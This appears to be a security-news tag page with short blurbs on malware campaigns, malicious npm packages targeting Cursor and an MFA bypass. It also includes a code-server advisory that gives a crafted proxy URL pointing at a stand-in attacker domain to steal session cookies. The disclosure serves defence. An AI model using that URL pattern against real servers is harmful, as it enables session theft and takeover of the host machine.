Tag
#mac
Varonis reveals attackers are using SEO poisoning to trick IT admins into downloading malware, alongside a critical root…
Plus: A DOGE operative’s laptop reportedly gets infected with malware, Grok AI is used to “undress” women on X, a school software company’s ransomware nightmare returns, and more.
### Summary
A maliciously crafted URL using the `proxy` subpath can result in the attacker gaining access to the session token.

### Details
Failure to properly validate the port for a `proxy` request can result in proxying to an arbitrary domain. The malicious URL `https://<code-server>/proxy/test@evil.com/path` would be proxied to `test@evil.com/path` where the attacker could exfiltrate a user's session token.

### Impact
Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to `/proxy`. Normally this is used to proxy local ports, however the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server.

### Patches
Patched versions are from...
Google announced it will equip Chrome with an AI-driven method to detect and block tech support scam websites.
A flaw in Microsoft Entra ID’s legacy login allowed attackers to bypass MFA, targeting admin accounts across finance,…
Cybersecurity researchers have flagged three malicious npm packages that are designed to target the Apple macOS version of Cursor, a popular artificial intelligence (AI)-powered source code editor. "Disguised as developer tools offering 'the cheapest Cursor API,' these packages steal user credentials, fetch an encrypted payload from threat actor-controlled infrastructure, overwrite Cursor's
Cloud-native applications offer scalable, automated workflows, intelligent data processing, and seamless deployments. However, many organizations still struggle to…
We're rolling out a brand new feature in Malwarebytes for iOS: the ability to block Google sponsored ads directly on Safari.
Bitdefender exposes Facebook ad scams using fake crypto sites and celebrity lures to spread malware via malicious desktop…
The age of AI guessing our passwords is upon us, and we need to change the ways we authenticate and use passwords where we have no alternatives.